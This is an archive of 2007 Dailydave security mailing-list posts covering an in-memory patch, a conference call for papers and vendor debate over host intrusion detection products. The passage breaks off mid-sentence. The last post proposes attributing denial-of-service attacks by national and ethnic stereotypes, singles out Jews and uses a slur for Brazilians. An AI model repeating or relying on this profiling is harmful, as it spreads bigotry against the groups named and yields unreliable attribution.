From ge at linuxbox.org Sun Apr 1 22:58:04 2007 From: ge at linuxbox.org (Gadi Evron) Date: Sun, 1 Apr 2007 21:58:04 -0500 (CDT) Subject: [Dailydave] ZERT's latest patch Message-ID: I would like to leave the 0day behind for now and just stare! The patch is just beautiful. Active patching in memory, no static address... rather generic patching in memory, searching for several signatures. Beautiful work from Gil Dabah. Take a look: http://zert.isotf.org/advisories/zert-2007-01.htm Gadi. From neal.krawetz at mac.hush.com Mon Apr 2 12:54:39 2007 From: neal.krawetz at mac.hush.com (neal.krawetz at mac.hush.com) Date: Mon, 02 Apr 2007 11:54:39 -0500 Subject: [Dailydave] Death by Cockatoo Message-ID: <20070402165440.1F58222826@mailserver9.hushmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 I got bit by a wild cockatoo. It was a white, sulfur-crested cockatoo. It seems, they have learned to eat out of people's hands - -- so I (and most other people on the tour bus) were feeding them. A few of the birds learned that if they bite or scratch the hand that feeds them, then the other hand will drop all of the food it is holding. One bird scratched my hand (didn't break the skin, but it did startle me and I dropped food). Another bird began stalking me. Every time I tried to feed anyone else, he was there. He ended up biting my thumb -- more like a 1/2 inch paper cut. However, I didn't drop the food for him. Net result? Bird drew blood and didn't get seeds. And I learned that the antiseptic liquid in wet- wipes burns like hell. How does this relate to computer security? Many organized crime gangs use hostile tactics such as DDoS to blackmail companies into handing over money. And on a smaller scale, I know a half dozen users without any ethical or social values who use impersonation and deceitful tactics to intimidate honest netizens. Like the wild cockatoo, don't give in to these threats or they will only be encouraged, continuing their abuses on other people and escalating from scratches to bites. -----BEGIN PGP SIGNATURE----- Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 2.5 wpwEAQECAAYFAkYRNQUACgkQDpFP8dW5K4Y6rgP/ZTY2Ewm6VK+uTp54zny1mOrm8z03 5z3O/jXH0GN1v4vs5SG40WRLH3xT/iFEO+h4Xgcu+tqD4tWBP8b7s/cbvz96ewN1KQ+H S2oXwN03YDpUSRMwXfBUaMUwx0sO7AJ2qcLI8FW4ovuQdElC0VofoBVFgR4qbR3GLoq1 BxguqJ8= =ZjX7 -----END PGP SIGNATURE----- -- Looking for insurance? Compare and save 50% today. Click here. http://tagline.hushmail.com/fc/CAaCXv1QT6vMlfdDWNV6k7dtPlNlgnlC/ From rd at vnsecurity.net Mon Apr 2 15:19:15 2007 From: rd at vnsecurity.net (rd) Date: Mon, 02 Apr 2007 22:19:15 +0300 Subject: [Dailydave] [CFP] VNSECON 07 - Call for Papers / HCMC - August 03-04, 2007 Message-ID: <46115733.70707@vnsecurity.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 `` ~ @@ ==VNSECURITY== CALL FOR PAPERS |=---------------------=[ VNSECON 2007 ]=----------------------=| |=-------------------------------------------------------------=| |=-------------------=[ August 3-4, 2007 ]=--------------------=| |=--------------=[ Ho Chi Minh City, Vietnam ]=----------------=| cfp @ vnsecurity.net [ http://conf.vnsecurity.net/cfp2007.txt ] The Call for Papers for VNSECON Security Conference 2007 is now open. VNSECON 2007 is a security conference taking place downtown in Ho Chi Minh City (aka Saigon), Vietnam from the 3rd to 4th of August 2007. Some invited papers have been confirmed, but a limited number of speaking slots are still available. - --[ Introduction VNSECON 2007 aims to be an event that enables the dissemination, discussion and sharing of security information between security communities. We organize a conference that gathers security experts, from the mainstream network security arena as well as the underground community, to share their researches, discoveries and experiences. We promise to make VNSECON a great and fun event for all security enthusiasts, regardless the colors on their hats. - --[ The Venue Ho Chi Minh City, fondly referred to as Saigon - "The Pearl of the Orient", still retains a charm reminiscent of its French- European heritage in the midst of rapid commercialization. The city promises an endless fascination for travelers wanting to explore Vietnam's rich 4,000-year history. It is a bustling, dynamic and industrious center, the largest city in the country, the economic capital and the cultural trendsetter. The streets, where much of the city's life takes place, is a myriad of street markets, shops, pavement cafes, stands-on-wheels and vendors selling wares spread out on sidewalks. More info: http://conf.vnsecurity.net/venue - --[ Topics Topics that will be considered include, but are not limited to: - 0dayz - Web Security - Criminal Laws - GSM, GPRS and CDMA Security - VoIP Security / Hacking - Wireless Security / Hacking - Exploitation - Attack and Defense Techniques - Access Control and Authentication - Reverse Engineering - Application Security, Testing, Fuzzing - Code Auditing - Virtualization - Malicious Code - Viruses, Worms, and Trojans - Spyware, Phishing and Botnets - Banking Security - Phreaking - Cryptography - Forensics - --[ Submissions Deadline for abstract submission: June 08th, 2007 Deadline for panel submission: June 15th, 2007 Deadline for paper submission: July 07th, 2007 Paper proposals should consist of the following information: 1) Topic synopsis, title, and a one paragraph description. 2) Presenter information (name, handler, country of origin / passport) and contact information (e-mail, postal address, phone, fax). 3) Employer and/or affiliations. 4) Brief biography, list of publications and papers. 5) Any significant presentation and educational experience / background. 6) Reason why this material is innovative, significant or an important tutorial. 7) Will you have full text available or only slides? Please send your submission to cfp @ vnsecurity.net. Please include the plain text version of this information in your email as well as any file, pdf, doc, sxw, ppt, or html attachments. Note that all speakers will be allocated 50 minutes of presentation time. If you require more time, please inform us in your submission. - --[ Speakers' Privileges 1) Accommodation will be provided (03 nights). We may be able to cover your traveling expense, but only if you let us know in advance in your submission. 2) Conference party. 3) Half-day tour after conference to Cu Chi Tunnels, an immense network of connecting underground tunnels from the Vietnam War (http://en.wikipedia.org/wiki/Cu_Chi_tunnels) Bonus: 5 rounds of firing AK-47 in the shooting range. 4) A large amount of free beer! - --[ Program Committee (alphabet order) 1) Andrew Griffiths (Ruxcon, pulltheplug.org) 2) Dug Song, (Arbor Networks, monkey.org) 3) HD Moore (BreakingPoint Systems, Metasploit Project) 4) Nguyen Anh Quynh (AIST Japan, VNSECURITY) 5) Red Dragon (THC, HERT, VNSECURITY) 6) SeekZero - Le Dinh Long (VNSECURITY) 7) SK Chong (SCAN Associates) 8) Skyper - Ralf Kaiser (ex-Phrack, THC) 9) van Hauser (The Hackers Choice - THC) - --[ Capture the Flag As part of VNSECON 2007, we organize an attack and defense "Capture The Flag" challenge. We are inviting speakers to contribute challenges for CTF competition. We are also inviting security / hacker groups to join the competition. For further details on the CTF, please check conference website and/or email ctf @ vnsecurity.net. - --[ Other Information For further information on the conference and submissions, please feel free to visit VNSECON 2007 website. On behalf of VNSECURITY Team, we thank you and look forward to receive your submissions. #VNSECON 07 - http://conf.vnsecurity.net -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2.2 (GNU/Linux) iD8DBQFGEVcyNksdd3G7gu8RAiZkAJ0dDMtYOMzCtsSCM85xvOq6VoAZIQCfZIBy 5dFPO4rIa4i6JDc/UHcgdSc= =PvmT -----END PGP SIGNATURE----- From olef.anderson at gmail.com Mon Apr 2 16:54:51 2007 From: olef.anderson at gmail.com (Olef Anderson) Date: Mon, 2 Apr 2007 13:54:51 -0700 Subject: [Dailydave] [CFP] VNSECON 07 - Call for Papers / HCMC - August 03-04, 2007 In-Reply-To: <46115733.70707@vnsecurity.net> References: <46115733.70707@vnsecurity.net> Message-ID: <9b4f936f0704021354p3313173vc5b091b0aaf9fa4@mail.gmail.com> I don't see what is to remembered so fondly about the colonial rape of Saigon by French Imperialism ? (you call that heritage ? doh!) Long Live the Ho Chi Minh City! regards, olef On 4/2/07, rd wrote: > > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > `` > ~ @@ ==VNSECURITY== > > CALL FOR PAPERS > > |=---------------------=[ VNSECON 2007 ]=----------------------=| > |=-------------------------------------------------------------=| > |=-------------------=[ August 3-4, 2007 ]=--------------------=| > |=--------------=[ Ho Chi Minh City, Vietnam ]=----------------=| > > cfp @ vnsecurity.net > [ http://conf.vnsecurity.net/cfp2007.txt ] > > > > The Call for Papers for VNSECON Security Conference 2007 is now > open. VNSECON 2007 is a security conference taking place downtown > in Ho Chi Minh City (aka Saigon), Vietnam from the 3rd to 4th of > August 2007. Some invited papers have been confirmed, but a > limited number of speaking slots are still available. > > > - --[ Introduction > > VNSECON 2007 aims to be an event that enables the dissemination, > discussion and sharing of security information between security > communities. We organize a conference that gathers security > experts, from the mainstream network security arena as well as > the underground community, to share their researches, discoveries > and experiences. > > We promise to make VNSECON a great and fun event for all security > enthusiasts, regardless the colors on their hats. > > > - --[ The Venue > > Ho Chi Minh City, fondly referred to as Saigon - "The Pearl of > the Orient", still retains a charm reminiscent of its French- > European heritage in the midst of rapid commercialization. The > city promises an endless fascination for travelers wanting to > explore Vietnam's rich 4,000-year history. It is a bustling, > dynamic and industrious center, the largest city in the country, > the economic capital and the cultural trendsetter. The streets, > where much of the city's life takes place, is a myriad of street > markets, shops, pavement cafes, stands-on-wheels and vendors > selling wares spread out on sidewalks. > > More info: http://conf.vnsecurity.net/venue > > > - --[ Topics > > Topics that will be considered include, but are not limited to: > > - 0dayz > - Web Security > - Criminal Laws > - GSM, GPRS and CDMA Security > - VoIP Security / Hacking > - Wireless Security / Hacking > - Exploitation > - Attack and Defense Techniques > - Access Control and Authentication > - Reverse Engineering > - Application Security, Testing, Fuzzing > - Code Auditing > - Virtualization > - Malicious Code > - Viruses, Worms, and Trojans > - Spyware, Phishing and Botnets > - Banking Security > - Phreaking > - Cryptography > - Forensics > > > - --[ Submissions > > Deadline for abstract submission: June 08th, 2007 > Deadline for panel submission: June 15th, 2007 > Deadline for paper submission: July 07th, 2007 > > > Paper proposals should consist of the following information: > > 1) Topic synopsis, title, and a one paragraph description. > 2) Presenter information (name, handler, country of origin / > passport) and contact information (e-mail, postal address, > phone, fax). > 3) Employer and/or affiliations. > 4) Brief biography, list of publications and papers. > 5) Any significant presentation and educational experience / > background. > 6) Reason why this material is innovative, significant or an > important tutorial. > 7) Will you have full text available or only slides? > > Please send your submission to cfp @ vnsecurity.net. Please > include the plain text version of this information in your email > as well as any file, pdf, doc, sxw, ppt, or html attachments. > Note that all speakers will be allocated 50 minutes of > presentation time. If you require more time, please inform us in > your submission. > > > - --[ Speakers' Privileges > > 1) Accommodation will be provided (03 nights). We may be able to > cover your traveling expense, but only if you let us know in > advance in your submission. > 2) Conference party. > 3) Half-day tour after conference to Cu Chi Tunnels, an immense > network of connecting underground tunnels from the Vietnam War > (http://en.wikipedia.org/wiki/Cu_Chi_tunnels) > Bonus: 5 rounds of firing AK-47 in the shooting range. > 4) A large amount of free beer! > > > - --[ Program Committee (alphabet order) > > 1) Andrew Griffiths (Ruxcon, pulltheplug.org) > 2) Dug Song, (Arbor Networks, monkey.org) > 3) HD Moore (BreakingPoint Systems, Metasploit Project) > 4) Nguyen Anh Quynh (AIST Japan, VNSECURITY) > 5) Red Dragon (THC, HERT, VNSECURITY) > 6) SeekZero - Le Dinh Long (VNSECURITY) > 7) SK Chong (SCAN Associates) > 8) Skyper - Ralf Kaiser (ex-Phrack, THC) > 9) van Hauser (The Hackers Choice - THC) > > > - --[ Capture the Flag > > As part of VNSECON 2007, we organize an attack and defense > "Capture The Flag" challenge. We are inviting speakers to > contribute challenges for CTF competition. We are also inviting > security / hacker groups to join the competition. For further > details on the CTF, please check conference website and/or email > ctf @ vnsecurity.net. > > > - --[ Other Information > > For further information on the conference and submissions, please > feel free to visit VNSECON 2007 website. On behalf of VNSECURITY > Team, we thank you and look forward to receive your submissions. > > > #VNSECON 07 - http://conf.vnsecurity.net > > > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.4.2.2 (GNU/Linux) > > iD8DBQFGEVcyNksdd3G7gu8RAiZkAJ0dDMtYOMzCtsSCM85xvOq6VoAZIQCfZIBy > 5dFPO4rIa4i6JDc/UHcgdSc= > =PvmT > -----END PGP SIGNATURE----- > _______________________________________________ > Dailydave mailing list > Dailydave at lists.immunitysec.com > http://lists.immunitysec.com/mailman/listinfo/dailydave > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20070402/2cc8e3bd/attachment.htm From dave.aitel at gmail.com Mon Apr 2 19:58:05 2007 From: dave.aitel at gmail.com (Dave Aitel) Date: Mon, 2 Apr 2007 19:58:05 -0400 Subject: [Dailydave] Risk Management Services Message-ID: A HIDS shakeup? Sana takes in more money and Ross Brown gets fired from eEye's CEO all in the same day? I never can get anyone to buy HIDS. We often recommend it in our reports, but no company ever bites the bullet and does it. Perhaps when they think HIDS they think this: http://media1.break.com/dnet/media/content/pic2903.jpg . I wanted to point out that Applied Security has posted the results from their shmoocon hacking contest (note that I come in last!). http://www.appliedsec.com/conferences.html They've also got a server set up so everyone can play, which, I have to say, takes cojones. I guess that's the sort of thing you can do when you are a sponsor for GRSecurity. -dave -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20070402/d38f261d/attachment.htm From kyle.c.quest at gmail.com Mon Apr 2 23:23:04 2007 From: kyle.c.quest at gmail.com (C Q) Date: Mon, 2 Apr 2007 23:23:04 -0400 Subject: [Dailydave] Risk Management Services In-Reply-To: References: Message-ID: There's probably two reasons why nobody wants to buy HIDS... First, which especially applies to Blink (made by eEye), it's because it's unusable... I turned it off and uninstalled it after using it for just a few minutes. Second, companies rely on their significant investements in firewalls, IPSes, application proxies, etc and they feel that they are protected enough (I'm not saying that they are correct in their assumptions, but that's what they usually think :-) ). Companies do, however, buy other types of host-based "risk management systems" that try to protect their IP, sensitive information, etc, which also helps them with compliance (SOX,HIPAA,PCI,etc). On 4/2/07, Dave Aitel wrote: > > A HIDS shakeup? Sana takes in more money and Ross Brown gets fired from > eEye's CEO all in the same day? I never can get anyone to buy HIDS. We often > recommend it in our reports, but no company ever bites the bullet and does > it. Perhaps when they think HIDS they think this: > http://media1.break.com/dnet/media/content/pic2903.jpg . > > I wanted to point out that Applied Security has posted the results from > their shmoocon hacking contest (note that I come in last!). > http://www.appliedsec.com/conferences.html > > They've also got a server set up so everyone can play, which, I have to > say, takes cojones. I guess that's the sort of thing you can do when you are > a sponsor for GRSecurity. > > -dave > > > _______________________________________________ > Dailydave mailing list > Dailydave at lists.immunitysec.com > http://lists.immunitysec.com/mailman/listinfo/dailydave > > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20070402/0a3a9537/attachment-0001.htm From dave.aitel at gmail.com Tue Apr 3 00:58:07 2007 From: dave.aitel at gmail.com (Dave Aitel) Date: Tue, 3 Apr 2007 00:58:07 -0400 Subject: [Dailydave] Risk Management Services In-Reply-To: References: Message-ID: According to Ryan Naraine[1], they're making 12 Million dollars a year selling that and Retina, so someone's using it. Oddly, it's the exact same amount of money that Sana just took in. Weird day in HIDS land. I spent all night trying to massage the Mercur IMAP NTLM bug into submission. Still nothing. Sometimes the hoolios are the hardest exploits. Apparently people actually use these weird little Windows servers though so they're worth doing. That's what I'm telling myself, after 10 hours on Mercur, anyways. -dave [1]http://blogs.zdnet.com/security/?p=148 On 4/2/07, C Q wrote: > > There's probably two reasons why nobody wants to buy HIDS... > First, which especially applies to Blink (made by eEye), it's > because it's unusable... I turned it off and uninstalled it > after using it for just a few minutes. Second, companies > rely on their significant investements in firewalls, IPSes, > application proxies, etc and they feel that they are protected > enough (I'm not saying that they are correct in their assumptions, > but that's what they usually think :-) ). > > Companies do, however, buy other types of host-based > "risk management systems" that try to protect their IP, > sensitive information, etc, which also helps them with compliance > (SOX,HIPAA,PCI,etc). > > On 4/2/07, Dave Aitel wrote: > > > A HIDS shakeup? Sana takes in more money and Ross Brown gets fired from > > eEye's CEO all in the same day? I never can get anyone to buy HIDS. We often > > recommend it in our reports, but no company ever bites the bullet and does > > it. Perhaps when they think HIDS they think this: > > http://media1.break.com/dnet/media/content/pic2903.jpg . > > > > I wanted to point out that Applied Security has posted the results from > > their shmoocon hacking contest (note that I come in last!). > > http://www.appliedsec.com/conferences.html > > > > They've also got a server set up so everyone can play, which, I have to > > say, takes cojones. I guess that's the sort of thing you can do when you are > > a sponsor for GRSecurity. > > > > -dave > > > > > > _______________________________________________ > > Dailydave mailing list > > Dailydave at lists.immunitysec.com > > http://lists.immunitysec.com/mailman/listinfo/dailydave > > > > > > _______________________________________________ > Dailydave mailing list > Dailydave at lists.immunitysec.com > http://lists.immunitysec.com/mailman/listinfo/dailydave > > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20070403/a329477c/attachment.htm From trklisted at networksamurai.org Tue Apr 3 11:19:05 2007 From: trklisted at networksamurai.org (trklisted at networksamurai.org) Date: Tue, 03 Apr 2007 11:19:05 -0400 Subject: [Dailydave] Risk Management Services Message-ID: <26761558.1071175613545616.JavaMail.servlet@perfora> An HTML attachment was scrubbed... URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20070403/42fedac8/attachment.html From pmelson at gmail.com Tue Apr 3 07:05:23 2007 From: pmelson at gmail.com (Paul Melson) Date: Tue, 3 Apr 2007 07:05:23 -0400 Subject: [Dailydave] Risk Management Services In-Reply-To: References: Message-ID: <40ecb01f0704030405ua9469f5r105d346a630153e3@mail.gmail.com> On 4/3/07, Dave Aitel wrote: > According to Ryan Naraine[1], they're making 12 Million dollars a year > selling that and Retina, so someone's using it. Oddly, it's the exact same > amount of money that Sana just took in. Weird day in HIDS land. Well, someone's using Retina at least. Which makes sense,since Nessus on pure Windows is still undoable and NVA/pentest work is a big-money consulting niche to this day. I've been off the road for 2 years, but I never saw and as far as I am aware still haven't met anyone that uses Blink. I've seen a few SecureIIS installs, though even that's probably a tough sell these days as it's no doubt getting harder to find people still running IIS 5 on Win2K. That may be the real reason we're seeing Brown go - the $12M from 2006 doesn't seem sustainable without a new product and/or new marketing that will drive sales. Hell, I bet they'd sell better if Marc Maiffret just started posting to full-disclosure again. http://marc.info/?l=full-disclosure&m=117524796007054&w=2 Speak of the devil. :-) Anyway, I think the reason HIDS in general doesn't see a lot of widespread adoption is that companies view their production networks - especially where Windows is running, where HIDS gets the most traction - as fragile. They don't want "agents" or "clients" or anything that could hurt performance or stability. And while I haven't personally ever touched Blink, I've seen it's competition implode when installed in just the wrong environment. That, and at still roughly 5-10x the per-seat cost of AV products, it's hard to sell a product that basically does what IT managers think AV does. PaulM From cisoguy at gmail.com Tue Apr 3 14:06:46 2007 From: cisoguy at gmail.com (Jeff Moore) Date: Tue, 3 Apr 2007 11:06:46 -0700 Subject: [Dailydave] Risk Management Services Message-ID: <97775f7a0704031106k1cf9d9f1u64beea7a8fa298e6@mail.gmail.com> 12 million is not a lot of money all things considered. Which is one reason to be careful when selecting a security vendor. You want one that will be around in the future. This is one reason why my organization passed on purchasing Blink from eEye. That plus the fact that we found the product to be completely unusable and it does not offer effective protection and the blue screens it caused when running with certain applications was a nice touch but not one we wanted on our network. We are a large health care provider, our pilot group was 2500 systems and we have opted to go with the McAfee solution, while it was not perfect it was no where near as bad as the eEye offering and at least it didn't crash our systems. Trust me on this one, we spent a lot of time in our lab testing these things and you would be surprised that once you actually get Blink to work, how insecure and even worse how unstable your system is. J -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20070403/0980abf0/attachment-0001.htm From adriel at netragard.com Tue Apr 3 14:33:19 2007 From: adriel at netragard.com (Adriel T. Desautels) Date: Tue, 03 Apr 2007 14:33:19 -0400 Subject: [Dailydave] Risk Management Services In-Reply-To: Message-ID: Host Intrusion Detection Systems by their very nature require that they are deployed on each host to be monitored. That creates a scalability and management issue. IDS/IPS is centralized for the most part. You simply install an agent at the ?focal? points of the network(s) and monitor all ingress and egress traffic. On 4/2/07 11:23 PM, "C Q" wrote: > There's probably two reasons why nobody wants to buy HIDS... > First, which especially applies to Blink (made by eEye), it's > because it's unusable... I turned it off and uninstalled it > after using it for just a few minutes. Second, companies > rely on their significant investements in firewalls, IPSes, > application proxies, etc and they feel that they are protected > enough (I'm not saying that they are correct in their assumptions, > but that's what they usually think :-) ). > > Companies do, however, buy other types of host-based > "risk management systems" that try to protect their IP, > sensitive information, etc, which also helps them with compliance > (SOX,HIPAA,PCI,etc). > > On 4/2/07, Dave Aitel wrote: >> A HIDS shakeup? Sana takes in more money and Ross Brown gets fired from >> eEye's CEO all in the same day? I never can get anyone to buy HIDS. We often >> recommend it in our reports, but no company ever bites the bullet and does >> it. Perhaps when they think HIDS they think this: >> http://media1.break.com/dnet/media/content/pic2903.jpg . >> >> I wanted to point out that Applied Security has posted the results from their >> shmoocon hacking contest (note that I come in last!). >> http://www.appliedsec.com/conferences.html >> >> They've also got a server set up so everyone can play, which, I have to say, >> takes cojones. I guess that's the sort of thing you can do when you are a >> sponsor for GRSecurity. >> >> -dave >> >> >> _______________________________________________ >> Dailydave mailing list >> Dailydave at lists.immunitysec.com >> http://lists.immunitysec.com/mailman/listinfo/dailydave >> > > > > _______________________________________________ > Dailydave mailing list > Dailydave at lists.immunitysec.com > http://lists.immunitysec.com/mailman/listinfo/dailydave -- Regards, Adriel T. Desautels Chief Technology Officer - Netragard, LLC Office: 617-934-0269 || Mobile : 857-636-8882 http://www.linkedin.com/pub/1/118/a45 http://www.netragard.com ------------------------- "We make IT secure." -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20070403/fd944377/attachment-0001.htm From mark.teicher at gmail.com Tue Apr 3 15:54:08 2007 From: mark.teicher at gmail.com (Mark Teicher) Date: Tue, 3 Apr 2007 15:54:08 -0400 Subject: [Dailydave] Risk Management Services In-Reply-To: <26761558.1071175613545616.JavaMail.servlet@perfora> References: <26761558.1071175613545616.JavaMail.servlet@perfora> Message-ID: <300c487a0704031254x2d00fef9u947b6b58cebf3375@mail.gmail.com> Can you actually pull data from the management station and produce legible reports yet?? On 4/3/07, trklisted at networksamurai.org wrote: > > I have about 1500 blink agents deployed at my hospital here in miami. > I've been on the product since it was unusable (version 1.2). Version 2.0was awesome, > 3.0 is better. I have taken it to a bunch of war nets and different cons > and it stands up. > > Although its a part of the fabric its not all of the fabric, we have been > worm / botnet / virus free for the most part since we've completed that > overhaul of the security fabric of that net. > > moses, networksamurai.org > According to Ryan Naraine[1], they're making 12 Million dollars a year > selling that and Retina, so someone's using it. Oddly, it's the exact same > amount of money that Sana just took in. Weird day in HIDS land. > > I spent all night trying to massage the Mercur IMAP NTLM bug into > submission. Still nothing. Sometimes the hoolios are the hardest exploits. > Apparently people actually use these weird little Windows servers though so > they're worth doing. That's what I'm telling myself, after 10 hours on > Mercur, anyways. > > -dave > [1]http://blogs.zdnet.com/security/?p=148 > > On 4/2/07, *C Q* wrote: > > There's probably two reasons why nobody wants to buy HIDS... > First, which especially applies to Blink (made by eEye), it's > because it's unusable... I turned it off and uninstalled it > after using it for just a few minutes. Second, companies > rely on their significant investements in firewalls, IPSes, > application proxies, etc and they feel that they are protected > enough (I'm not saying that they are correct in their assumptions, > but that's what they usually think :-) ). > > Companies do, however, buy other types of host-based > "risk management systems" that try to protect their IP, > sensitive information, etc, which also helps them with compliance > (SOX,HIPAA,PCI,etc). > > On 4/2/07, *Dave Aitel* < dave.aitel at gmail.com> wrote: > > A HIDS shakeup? Sana takes in more money and Ross Brown gets fired from > eEye's CEO all in the same day? I never can get anyone to buy HIDS. We often > recommend it in our reports, but no company ever bites the bullet and does > it. Perhaps when they think HIDS they think this: > http://media1.break.com/dnet/media/content/pic2903.jpg . > > I wanted to point out that Applied Security has posted the results from > their shmoocon hacking contest (note that I come in last!). > http://www.appliedsec.com/conferences.html > > They've also got a server set up so everyone can play, which, I have to > say, takes cojones. I guess that's the sort of thing you can do when you are > a sponsor for GRSecurity. > > -dave > > > _______________________________________________ > Dailydave mailing list > Dailydave at lists.immunitysec.com > http://lists.immunitysec.com/mailman/listinfo/dailydave > > > > _______________________________________________ > Dailydave mailing list > Dailydave at lists.immunitysec.com > http://lists.immunitysec.com/mailman/listinfo/dailydave > > > > _______________________________________________ > Dailydave mailing list > Dailydave at lists.immunitysec.com > http://lists.immunitysec.com/mailman/listinfo/dailydave > > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20070403/f84c97fa/attachment.htm From trklisted at networksamurai.org Tue Apr 3 16:17:15 2007 From: trklisted at networksamurai.org (trklisted[at]networksamurai[dot]org) Date: Tue, 03 Apr 2007 16:17:15 -0400 Subject: [Dailydave] Risk Management Services In-Reply-To: <300c487a0704031254x2d00fef9u947b6b58cebf3375@mail.gmail.com> References: <26761558.1071175613545616.JavaMail.servlet@perfora> <300c487a0704031254x2d00fef9u947b6b58cebf3375@mail.gmail.com> Message-ID: <4612B64B.7020406@networksamurai.org> REM 2 (The main management station for all products), that was pretty bad... REM 3 is very good and I am getting better reports like it actually reports blink attacks, and I can get hardware delta's... If you saw it about 1 year ago... i feel your pain.... Mark Teicher wrote: > Can you actually pull data from the management station and produce > legible reports yet?? > > On 4/3/07, *trklisted at networksamurai.org > * > wrote: > > I have about 1500 blink agents deployed at my hospital here in > miami. I've been on the product since it was unusable (version > 1.2). Version 2.0 was awesome, 3.0 is better. I have taken it to a > bunch of war nets and different cons and it stands up. > > Although its a part of the fabric its not all of the fabric, we > have been worm / botnet / virus free for the most part since we've > completed that overhaul of the security fabric of that net. > > moses, networksamurai.org > > > From cisoguy at gmail.com Tue Apr 3 16:31:18 2007 From: cisoguy at gmail.com (Jeff Moore) Date: Tue, 3 Apr 2007 13:31:18 -0700 Subject: [Dailydave] Risk Management Services In-Reply-To: <40ecb01f0704030405ua9469f5r105d346a630153e3@mail.gmail.com> References: <40ecb01f0704030405ua9469f5r105d346a630153e3@mail.gmail.com> Message-ID: <97775f7a0704031331o736b017cv9c22ac0c09978293@mail.gmail.com> On 4/3/07, Paul Melson wrote: > Well, someone's using Retina at least. Which makes sense,since Nessus > on pure Windows is still undoable and NVA/pentest work is a big-money Have you seen the state of Retina lately? It appears, at least as a customer, that they have put all resources into Blink which is a bad move. Their coverage for Windows issues is now limited to simply checking registry keys for patches and their alternative operating system scanning is broken and never yields consistent results. Somehow I have a hard time trusting a solution that can give different results each time you scan the same system on the same day where there have been no changes. This would be why we are now looking at Tenable and nCircle for our VA needs. > http://marc.info/?l=full-disclosure&m=117524796007054&w=2 Too bad their patch for that issue was sloppy and very much like Blink. Ineffective. > Anyway, I think the reason HIDS in general doesn't see a lot of > widespread adoption is that companies view their production networks - > especially where Windows is running, where HIDS gets the most traction > - as fragile. They don't want "agents" or "clients" or anything that > could hurt performance or stability. And while I haven't personally > ever touched Blink, I've seen it's competition implode when installed > in just the wrong environment. That, and at still roughly 5-10x the > per-seat cost of AV products, it's hard to sell a product that > basically does what IT managers think AV does. I mostly agree. In our installation, we spent a lot of lab time testing all of the potential HIPS solutions and once we decided on one we spent even more time in our lab tweaking it to not break our applications and to not cause instability. J -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20070403/e3803cbb/attachment.htm From neal.krawetz at mac.hush.com Wed Apr 4 09:12:43 2007 From: neal.krawetz at mac.hush.com (neal.krawetz at mac.hush.com) Date: Wed, 04 Apr 2007 08:12:43 -0500 Subject: [Dailydave] Stereotyping DoS and Don'ts Message-ID: <20070404131244.04712DA82F@mailserver7.hushmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 While nobody likes to be stereotyped, there is always truth behind the generic, nationality-based profiles. For example, I was recently in Australia as part of a necessary trip. I was waiting with a small crowd of people outside a grocery store, waiting for it to open. I could instantly separate the tourists from the locals. There was a large set of people standing by the door. They didn't move; if it weren't for the occasional breath, I would have thought they were statues. They were the local Aussies. They were patiently waiting for the doors to open. A minority of the people were more anxious. They would shuffle their feet, constantly look around for a place to sit (benches are a rarity outside of tourist areas), and check and recheck their watches. They were the tourists. The grocery store was supposed to open at 7:00am. At 6:59 and 28 seconds, a trio came down the escalator. They never checked their watches and never looked for a clock, yet they appeared concerned that the store was not open. I knew their nationality even before they spoke: punctual to the second, knowing the time without a watch? Jews. All of this makes me wonder... could stereotyping by nationality can act as a first-pass for identifying some cybercrimes, such as denial-of-service attacks. For example: * Western Europe is usually punctual to the second and well planned. A DoS should start at a precise time and last a precise duration. It should not vary from the plan during the attack. * Chinese value punctuality and uniformity. A DoS should be similar to Western Europe, but should not vary in attack methods. For example, if there are 10,000 computers being used in an attack, they will all be configured the same way and used the same way. You won't see a variety of simultaneous attacks. * Latin America and Mexico value content over punctuality. It's OK to be late as long as you contribute. A DoS may not start on time or appear initially organized or even homogeneous, but all attack- bots should contribute to the fray. * The USA and Canada are stereotypical in that they are not extreme in any single dimension. An attack may not start precisely at 1:00, but it will be "around 1:00", it may not be homogeneous, but it will be close. And it may change as needed rather then exhaust one attack method. Americans are also more solitary. You won't see a hundred American hackers working in unison on the same target as you would in China or Brazil. Using these generic and empirical profiles, we can start guestimating who is behind some known attacks. For example: * The recent DoS against the root level DNS servers started exactly on the hour. At intervals of 1 hour, there were changes to the attack method. Both the Western Europe and China match this kind of attack: precisely timed, planned, homogeneous, and exhaustive. * The attack against Blue Frog did not start at any particular hour/minute, but it was well choreographed. Each time the attack succeeded and Blue Frog moved on to an alternate safe haven, a new attack method would be initiated. Planned, yet not long-term planning. There was also only one type of attack at a time, suggesting an individual or very small group. This sounds like an American or Canadian. * Similar to Blue Frog, the Smurf attacks from Mafiaboy were not precisely timed, but were exhaustive, showed short-term planning, and were independent attacks. Mafiaboy was Canadian. * The recent DoS against GoDaddy was reportedly spread across a few days, building as it went. It was a variety of attack methods that all assisted in the total attack. This sounds like Latin America and the hacker groups in Brazil immediately come to mind. Stereotyping and profiling is commonly criticized for its inaccuracy. Not every American is fat, self-absorbed, and eats doughnuts for breakfast. Similarly, there is fuzziness since people may not be located in their influencing country. For example, a Brazilian who is married to a German and living in Canada may appear as any one of the stereotypes, or as a combination. (Then again, a Brazilian married to a German and living in Canada is probably not stereotypical, since Germans are too intelligent to marry coconuts.) However, profiling can be used to organize information before wasting time in an exhaustive search for 